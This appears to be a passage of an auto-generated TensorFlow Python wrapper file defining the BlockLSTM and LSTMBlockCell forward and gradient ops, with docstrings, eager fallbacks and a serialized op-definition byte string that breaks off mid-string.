from tensorflow.python.framework import common_shapes as _common_shapes
from tensorflow.python.framework import op_def_registry as _op_def_registry
from tensorflow.python.framework import ops as _ops
from tensorflow.python.framework import op_def_library as _op_def_library
from tensorflow.python.util.deprecation import deprecated_endpoints
from tensorflow.python.util.tf_export import tf_export
_block_lstm_outputs = ["i", "cs", "f", "o", "ci", "co", "h"]
_BlockLSTMOutput = _collections.namedtuple(
"BlockLSTM", _block_lstm_outputs)
@tf_export('block_lstm')
def block_lstm(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None):
r"""Computes the LSTM cell forward propagation for all the time steps.
This is equivalent to applying LSTMBlockCell in a loop, like so:
```python
for x1 in unpack(x):
i1, cs1, f1, o1, ci1, co1, h1 = LSTMBlock(
x1, cs_prev, h_prev, w, wci, wcf, wco, b)
cs_prev = cs1
h_prev = h1
i.append(i1)
cs.append(cs1)
f.append(f1)
o.append(o1)
ci.append(ci1)
co.append(co1)
h.append(h1)
return pack(i), pack(cs), pack(f), pack(o), pack(ci), pack(ch), pack(h)
```
Args:
seq_len_max: A `Tensor` of type `int64`.
Maximum time length actually used by this input. Outputs are padded
with zeros beyond this length.
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The sequence input to the LSTM, shape (timelen, batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
Value of the initial cell state.
h_prev: A `Tensor`. Must have the same type as `x`.
Initial output of cell (to be used for peephole).
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
forget_bias: An optional `float`. Defaults to `1`. The forget gate bias.
cell_clip: An optional `float`. Defaults to `3`.
Value to clip the 'cs' value to.
use_peephole: An optional `bool`. Defaults to `False`.
Whether to use peephole weights.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (i, cs, f, o, ci, co, h).
i: A `Tensor`. Has the same type as `x`. The input gate over the whole time sequence.
cs: A `Tensor`. Has the same type as `x`. The cell state before the tanh over the whole time sequence.
f: A `Tensor`. Has the same type as `x`. The forget gate over the whole time sequence.
o: A `Tensor`. Has the same type as `x`. The output gate over the whole time sequence.
ci: A `Tensor`. Has the same type as `x`. The cell input over the whole time sequence.
co: A `Tensor`. Has the same type as `x`. The cell after the tanh over the whole time sequence.
h: A `Tensor`. Has the same type as `x`. The output h vector over the whole time sequence.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"BlockLSTM", seq_len_max=seq_len_max, x=x, cs_prev=cs_prev,
h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b,
forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("forget_bias", _op.get_attr("forget_bias"), "cell_clip",
_op.get_attr("cell_clip"), "use_peephole",
_op.get_attr("use_peephole"), "T", _op.get_attr("T"))
_execute.record_gradient(
"BlockLSTM", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name, "BlockLSTM",
name, _ctx._post_execution_callbacks, seq_len_max, x, cs_prev, h_prev,
w, wci, wcf, wco, b, "forget_bias", forget_bias, "cell_clip",
cell_clip, "use_peephole", use_peephole)
_result = _BlockLSTMOutput._make(_result)
return _result
except _core._FallbackException:
return block_lstm_eager_fallback(
seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b,
forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def block_lstm_eager_fallback(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function block_lstm
"""
_ctx = ctx if ctx else _context.context()
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b) = _inputs_T
seq_len_max = _ops.convert_to_tensor(seq_len_max, _dtypes.int64)
_inputs_flat = [seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b]
_attrs = ("forget_bias", forget_bias, "cell_clip", cell_clip,
"use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"BlockLSTM", 7, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BlockLSTM", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMOutput._make(_result)
return _result
_ops.RegisterShape("BlockLSTM")(None)
_block_lstm_grad_outputs = ["x_grad", "cs_prev_grad", "h_prev_grad", "w_grad",
"wci_grad", "wcf_grad", "wco_grad", "b_grad"]
_BlockLSTMGradOutput = _collections.namedtuple(
"BlockLSTMGrad", _block_lstm_grad_outputs)
@tf_export('block_lstm_grad')
def block_lstm_grad(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad, use_peephole, name=None):
r"""Computes the LSTM cell backward propagation for the entire time sequence.
This implementation is to be used in conjunction of LSTMBlock.
Args:
seq_len_max: A `Tensor` of type `int64`.
Maximum time length actually used by this input. Outputs are padded
with zeros beyond this length.
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The sequence input to the LSTM, shape (timelen, batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
Value of the initial cell state.
h_prev: A `Tensor`. Must have the same type as `x`.
Initial output of cell (to be used for peephole).
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
i: A `Tensor`. Must have the same type as `x`.
The input gate over the whole time sequence.
cs: A `Tensor`. Must have the same type as `x`.
The cell state before the tanh over the whole time sequence.
f: A `Tensor`. Must have the same type as `x`.
The forget gate over the whole time sequence.
o: A `Tensor`. Must have the same type as `x`.
The output gate over the whole time sequence.
ci: A `Tensor`. Must have the same type as `x`.
The cell input over the whole time sequence.
co: A `Tensor`. Must have the same type as `x`.
The cell after the tanh over the whole time sequence.
h: A `Tensor`. Must have the same type as `x`.
The output h vector over the whole time sequence.
cs_grad: A `Tensor`. Must have the same type as `x`.
The current gradient of cs.
h_grad: A `Tensor`. Must have the same type as `x`.
The gradient of h vector.
use_peephole: A `bool`. Whether to use peephole weights.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (x_grad, cs_prev_grad, h_prev_grad, w_grad, wci_grad, wcf_grad, wco_grad, b_grad).
x_grad: A `Tensor`. Has the same type as `x`. The gradient of x to be back-propped.
cs_prev_grad: A `Tensor`. Has the same type as `x`. The gradient of cs_prev to be back-propped.
h_prev_grad: A `Tensor`. Has the same type as `x`. The gradient of h_prev to be back-propped.
w_grad: A `Tensor`. Has the same type as `x`. The gradient for w to be back-propped.
wci_grad: A `Tensor`. Has the same type as `x`. The gradient for wci to be back-propped.
wcf_grad: A `Tensor`. Has the same type as `x`. The gradient for wcf to be back-propped.
wco_grad: A `Tensor`. Has the same type as `x`. The gradient for wco to be back-propped.
b_grad: A `Tensor`. Has the same type as `x`. The gradient for w to be back-propped.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"BlockLSTMGrad", seq_len_max=seq_len_max, x=x, cs_prev=cs_prev,
h_prev=h_prev, w=w, wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f,
o=o, ci=ci, co=co, h=h, cs_grad=cs_grad, h_grad=h_grad,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("use_peephole", _op.get_attr("use_peephole"), "T",
_op.get_attr("T"))
_execute.record_gradient(
"BlockLSTMGrad", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMGradOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"BlockLSTMGrad", name, _ctx._post_execution_callbacks, seq_len_max, x,
cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad,
h_grad, "use_peephole", use_peephole)
_result = _BlockLSTMGradOutput._make(_result)
return _result
except _core._FallbackException:
return block_lstm_grad_eager_fallback(
seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o,
ci, co, h, cs_grad, h_grad, use_peephole=use_peephole, name=name,
ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def block_lstm_grad_eager_fallback(seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad, use_peephole, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function block_lstm_grad
"""
_ctx = ctx if ctx else _context.context()
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad) = _inputs_T
seq_len_max = _ops.convert_to_tensor(seq_len_max, _dtypes.int64)
_inputs_flat = [seq_len_max, x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, h, cs_grad, h_grad]
_attrs = ("use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"BlockLSTMGrad", 8, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"BlockLSTMGrad", _inputs_flat, _attrs, _result, name)
_result = _BlockLSTMGradOutput._make(_result)
return _result
_ops.RegisterShape("BlockLSTMGrad")(None)
_lstm_block_cell_outputs = ["i", "cs", "f", "o", "ci", "co", "h"]
_LSTMBlockCellOutput = _collections.namedtuple(
"LSTMBlockCell", _lstm_block_cell_outputs)
@tf_export('lstm_block_cell')
def lstm_block_cell(x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None):
r"""Computes the LSTM cell forward propagation for 1 time step.
This implementation uses 1 weight matrix and 1 bias vector, and there's an
optional peephole connection.
This kernel op implements the following mathematical equations:
```python
xh = [x, h_prev]
[i, f, ci, o] = xh * w + b
f = f + forget_bias
if not use_peephole:
wci = wcf = wco = 0
i = sigmoid(cs_prev * wci + i)
f = sigmoid(cs_prev * wcf + f)
ci = tanh(ci)
cs = ci .* i + cs_prev .* f
cs = clip(cs, cell_clip)
o = sigmoid(cs * wco + o)
co = tanh(cs)
h = co .* o
```
Args:
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The input to the LSTM cell, shape (batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
Value of the cell state at previous time step.
h_prev: A `Tensor`. Must have the same type as `x`.
Output of the previous cell at previous time step.
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
forget_bias: An optional `float`. Defaults to `1`. The forget gate bias.
cell_clip: An optional `float`. Defaults to `3`.
Value to clip the 'cs' value to.
use_peephole: An optional `bool`. Defaults to `False`.
Whether to use peephole weights.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (i, cs, f, o, ci, co, h).
i: A `Tensor`. Has the same type as `x`. The input gate.
cs: A `Tensor`. Has the same type as `x`. The cell state before the tanh.
f: A `Tensor`. Has the same type as `x`. The forget gate.
o: A `Tensor`. Has the same type as `x`. The output gate.
ci: A `Tensor`. Has the same type as `x`. The cell input.
co: A `Tensor`. Has the same type as `x`. The cell after the tanh.
h: A `Tensor`. Has the same type as `x`. The output h vector.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"LSTMBlockCell", x=x, cs_prev=cs_prev, h_prev=h_prev, w=w, wci=wci,
wcf=wcf, wco=wco, b=b, forget_bias=forget_bias, cell_clip=cell_clip,
use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("forget_bias", _op.get_attr("forget_bias"), "cell_clip",
_op.get_attr("cell_clip"), "use_peephole",
_op.get_attr("use_peephole"), "T", _op.get_attr("T"))
_execute.record_gradient(
"LSTMBlockCell", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"LSTMBlockCell", name, _ctx._post_execution_callbacks, x, cs_prev,
h_prev, w, wci, wcf, wco, b, "forget_bias", forget_bias, "cell_clip",
cell_clip, "use_peephole", use_peephole)
_result = _LSTMBlockCellOutput._make(_result)
return _result
except _core._FallbackException:
return lstm_block_cell_eager_fallback(
x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=forget_bias,
cell_clip=cell_clip, use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def lstm_block_cell_eager_fallback(x, cs_prev, h_prev, w, wci, wcf, wco, b, forget_bias=1, cell_clip=3, use_peephole=False, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function lstm_block_cell
"""
_ctx = ctx if ctx else _context.context()
if forget_bias is None:
forget_bias = 1
forget_bias = _execute.make_float(forget_bias, "forget_bias")
if cell_clip is None:
cell_clip = 3
cell_clip = _execute.make_float(cell_clip, "cell_clip")
if use_peephole is None:
use_peephole = False
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b) = _inputs_T
_inputs_flat = [x, cs_prev, h_prev, w, wci, wcf, wco, b]
_attrs = ("forget_bias", forget_bias, "cell_clip", cell_clip,
"use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"LSTMBlockCell", 7, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"LSTMBlockCell", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellOutput._make(_result)
return _result
_ops.RegisterShape("LSTMBlockCell")(None)
_lstm_block_cell_grad_outputs = ["cs_prev_grad", "dicfo", "wci_grad",
"wcf_grad", "wco_grad"]
_LSTMBlockCellGradOutput = _collections.namedtuple(
"LSTMBlockCellGrad", _lstm_block_cell_grad_outputs)
@tf_export('lstm_block_cell_grad')
def lstm_block_cell_grad(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad, use_peephole, name=None):
r"""Computes the LSTM cell backward propagation for 1 timestep.
This implementation is to be used in conjunction of LSTMBlockCell.
Args:
x: A `Tensor`. Must be one of the following types: `half`, `float32`.
The input to the LSTM cell, shape (batch_size, num_inputs).
cs_prev: A `Tensor`. Must have the same type as `x`.
The previous cell state.
h_prev: A `Tensor`. Must have the same type as `x`. The previous h state.
w: A `Tensor`. Must have the same type as `x`. The weight matrix.
wci: A `Tensor`. Must have the same type as `x`.
The weight matrix for input gate peephole connection.
wcf: A `Tensor`. Must have the same type as `x`.
The weight matrix for forget gate peephole connection.
wco: A `Tensor`. Must have the same type as `x`.
The weight matrix for output gate peephole connection.
b: A `Tensor`. Must have the same type as `x`. The bias vector.
i: A `Tensor`. Must have the same type as `x`. The input gate.
cs: A `Tensor`. Must have the same type as `x`.
The cell state before the tanh.
f: A `Tensor`. Must have the same type as `x`. The forget gate.
o: A `Tensor`. Must have the same type as `x`. The output gate.
ci: A `Tensor`. Must have the same type as `x`. The cell input.
co: A `Tensor`. Must have the same type as `x`. The cell after the tanh.
cs_grad: A `Tensor`. Must have the same type as `x`.
The current gradient of cs.
h_grad: A `Tensor`. Must have the same type as `x`.
The gradient of h vector.
use_peephole: A `bool`. Whether the cell uses peephole connections.
name: A name for the operation (optional).
Returns:
A tuple of `Tensor` objects (cs_prev_grad, dicfo, wci_grad, wcf_grad, wco_grad).
cs_prev_grad: A `Tensor`. Has the same type as `x`. The gradient of cs to be back-propped.
dicfo: A `Tensor`. Has the same type as `x`. The derivative wrt to [i, cs, f, o].
wci_grad: A `Tensor`. Has the same type as `x`. The gradient for wci to be back-propped.
wcf_grad: A `Tensor`. Has the same type as `x`. The gradient for wcf to be back-propped.
wco_grad: A `Tensor`. Has the same type as `x`. The gradient for wco to be back-propped.
"""
_ctx = _context._context
if _ctx is None or not _ctx._eager_context.is_eager:
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_, _, _op = _op_def_lib._apply_op_helper(
"LSTMBlockCellGrad", x=x, cs_prev=cs_prev, h_prev=h_prev, w=w,
wci=wci, wcf=wcf, wco=wco, b=b, i=i, cs=cs, f=f, o=o, ci=ci, co=co,
cs_grad=cs_grad, h_grad=h_grad, use_peephole=use_peephole, name=name)
_result = _op.outputs[:]
_inputs_flat = _op.inputs
_attrs = ("use_peephole", _op.get_attr("use_peephole"), "T",
_op.get_attr("T"))
_execute.record_gradient(
"LSTMBlockCellGrad", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
else:
try:
_result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
_ctx._context_handle, _ctx._eager_context.device_name,
"LSTMBlockCellGrad", name, _ctx._post_execution_callbacks, x, cs_prev,
h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad,
"use_peephole", use_peephole)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
except _core._FallbackException:
return lstm_block_cell_grad_eager_fallback(
x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co,
cs_grad, h_grad, use_peephole=use_peephole, name=name, ctx=_ctx)
except _core._NotOkStatusException as e:
if name is not None:
message = e.message + " name: " + name
else:
message = e.message
_six.raise_from(_core._status_to_exception(e.code, message), None)
def lstm_block_cell_grad_eager_fallback(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad, use_peephole, name=None, ctx=None):
r"""This is the slowpath function for Eager mode.
This is for function lstm_block_cell_grad
"""
_ctx = ctx if ctx else _context.context()
use_peephole = _execute.make_bool(use_peephole, "use_peephole")
_attr_T, _inputs_T = _execute.args_to_matching_eager([x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad], _ctx)
(x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad) = _inputs_T
_inputs_flat = [x, cs_prev, h_prev, w, wci, wcf, wco, b, i, cs, f, o, ci, co, cs_grad, h_grad]
_attrs = ("use_peephole", use_peephole, "T", _attr_T)
_result = _execute.execute(b"LSTMBlockCellGrad", 5, inputs=_inputs_flat,
attrs=_attrs, ctx=_ctx, name=name)
_execute.record_gradient(
"LSTMBlockCellGrad", _inputs_flat, _attrs, _result, name)
_result = _LSTMBlockCellGradOutput._make(_result)
return _result
_ops.RegisterShape("LSTMBlockCellGrad")(None)
def _InitOpDefLibrary(op_list_proto_bytes):
op_list = _op_def_pb2.OpList()
op_list.ParseFromString(op_list_proto_bytes)
_op_def_registry.register_op_list(op_list)
op_def_lib = _op_def_library.OpDefLibrary()
op_def_lib.add_op_list(op_list)
return op_def_lib
# op {
# name: "BlockLSTM"
# input_arg {
# name: "seq_len_max"
# type: DT_INT64
# }
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# output_arg {
# name: "i"
# type_attr: "T"
# }
# output_arg {
# name: "cs"
# type_attr: "T"
# }
# output_arg {
# name: "f"
# type_attr: "T"
# }
# output_arg {
# name: "o"
# type_attr: "T"
# }
# output_arg {
# name: "ci"
# type_attr: "T"
# }
# output_arg {
# name: "co"
# type_attr: "T"
# }
# output_arg {
# name: "h"
# type_attr: "T"
# }
# attr {
# name: "forget_bias"
# type: "float"
# default_value {
# f: 1
# }
# }
# attr {
# name: "cell_clip"
# type: "float"
# default_value {
# f: 3
# }
# }
# attr {
# name: "use_peephole"
# type: "bool"
# default_value {
# b: false
# }
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
# op {
# name: "BlockLSTMGrad"
# input_arg {
# name: "seq_len_max"
# type: DT_INT64
# }
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# input_arg {
# name: "i"
# type_attr: "T"
# }
# input_arg {
# name: "cs"
# type_attr: "T"
# }
# input_arg {
# name: "f"
# type_attr: "T"
# }
# input_arg {
# name: "o"
# type_attr: "T"
# }
# input_arg {
# name: "ci"
# type_attr: "T"
# }
# input_arg {
# name: "co"
# type_attr: "T"
# }
# input_arg {
# name: "h"
# type_attr: "T"
# }
# input_arg {
# name: "cs_grad"
# type_attr: "T"
# }
# input_arg {
# name: "h_grad"
# type_attr: "T"
# }
# output_arg {
# name: "x_grad"
# type_attr: "T"
# }
# output_arg {
# name: "cs_prev_grad"
# type_attr: "T"
# }
# output_arg {
# name: "h_prev_grad"
# type_attr: "T"
# }
# output_arg {
# name: "w_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wci_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wcf_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wco_grad"
# type_attr: "T"
# }
# output_arg {
# name: "b_grad"
# type_attr: "T"
# }
# attr {
# name: "use_peephole"
# type: "bool"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
# op {
# name: "LSTMBlockCell"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# output_arg {
# name: "i"
# type_attr: "T"
# }
# output_arg {
# name: "cs"
# type_attr: "T"
# }
# output_arg {
# name: "f"
# type_attr: "T"
# }
# output_arg {
# name: "o"
# type_attr: "T"
# }
# output_arg {
# name: "ci"
# type_attr: "T"
# }
# output_arg {
# name: "co"
# type_attr: "T"
# }
# output_arg {
# name: "h"
# type_attr: "T"
# }
# attr {
# name: "forget_bias"
# type: "float"
# default_value {
# f: 1
# }
# }
# attr {
# name: "cell_clip"
# type: "float"
# default_value {
# f: 3
# }
# }
# attr {
# name: "use_peephole"
# type: "bool"
# default_value {
# b: false
# }
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
# op {
# name: "LSTMBlockCellGrad"
# input_arg {
# name: "x"
# type_attr: "T"
# }
# input_arg {
# name: "cs_prev"
# type_attr: "T"
# }
# input_arg {
# name: "h_prev"
# type_attr: "T"
# }
# input_arg {
# name: "w"
# type_attr: "T"
# }
# input_arg {
# name: "wci"
# type_attr: "T"
# }
# input_arg {
# name: "wcf"
# type_attr: "T"
# }
# input_arg {
# name: "wco"
# type_attr: "T"
# }
# input_arg {
# name: "b"
# type_attr: "T"
# }
# input_arg {
# name: "i"
# type_attr: "T"
# }
# input_arg {
# name: "cs"
# type_attr: "T"
# }
# input_arg {
# name: "f"
# type_attr: "T"
# }
# input_arg {
# name: "o"
# type_attr: "T"
# }
# input_arg {
# name: "ci"
# type_attr: "T"
# }
# input_arg {
# name: "co"
# type_attr: "T"
# }
# input_arg {
# name: "cs_grad"
# type_attr: "T"
# }
# input_arg {
# name: "h_grad"
# type_attr: "T"
# }
# output_arg {
# name: "cs_prev_grad"
# type_attr: "T"
# }
# output_arg {
# name: "dicfo"
# type_attr: "T"
# }
# output_arg {
# name: "wci_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wcf_grad"
# type_attr: "T"
# }
# output_arg {
# name: "wco_grad"
# type_attr: "T"
# }
# attr {
# name: "use_peephole"
# type: "bool"
# }
# attr {
# name: "T"
# type: "type"
# allowed_values {
# list {
# type: DT_HALF
# type: DT_FLOAT
# }
# }
# }
# }
_op_def_lib = _InitOpDefLibrary(b"\n\215\002\n\tBlockLSTM\022\017\n\013seq_len_max\030\t\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\032\006\n\001i\"\001T\032\007\n\002cs\"\001T\032\006\n\001f\"\001T\032\006\n\001o\"\001T\032\007\n\002ci\"\001T\032\007\n\002co\"\001T\032\006\n\001h\"\001T\"\033\n\013forget_bias\022\005float\032\005%\000\000\200?\"\031\n\tcell_clip\022\005float\032\005%\000\000@@\"\030\n\014use_peephole\022\004bool\032\002(\000\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\351\002\n\rBlockLSTMGrad\022\017\n\013seq_len_max\030\t\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\022\006\n\001i\"\001T\022\007\n\002cs\"\001T\022\006\n\001f\"\001T\022\006\n\001o\"\001T\022\007\n\002ci\"\001T\022\007\n\002co\"\001T\022\006\n\001h\"\001T\022\014\n\007cs_grad\"\001T\022\013\n\006h_grad\"\001T\032\013\n\006x_grad\"\001T\032\021\n\014cs_prev_grad\"\001T\032\020\n\013h_prev_grad\"\001T\032\013\n\006w_grad\"\001T\032\r\n\010wci_grad\"\001T\032\r\n\010wcf_grad\"\001T\032\r\n\010wco_grad\"\001T\032\013\n\006b_grad\"\001T\"\024\n\014use_peephole\022\004bool\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\200\002\n\rLSTMBlockCell\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\001T\022\013\n\006h_prev\"\001T\022\006\n\001w\"\001T\022\010\n\003wci\"\001T\022\010\n\003wcf\"\001T\022\010\n\003wco\"\001T\022\006\n\001b\"\001T\032\006\n\001i\"\001T\032\007\n\002cs\"\001T\032\006\n\001f\"\001T\032\006\n\001o\"\001T\032\007\n\002ci\"\001T\032\007\n\002co\"\001T\032\006\n\001h\"\001T\"\033\n\013forget_bias\022\005float\032\005%\000\000\200?\"\031\n\tcell_clip\022\005float\032\005%\000\000@@\"\030\n\014use_peephole\022\004bool\032\002(\000\"\021\n\001T\022\004type:\006\n\0042\002\023\001\n\247\002\n\021LSTMBlockCellGrad\022\006\n\001x\"\001T\022\014\n\007cs_prev\"\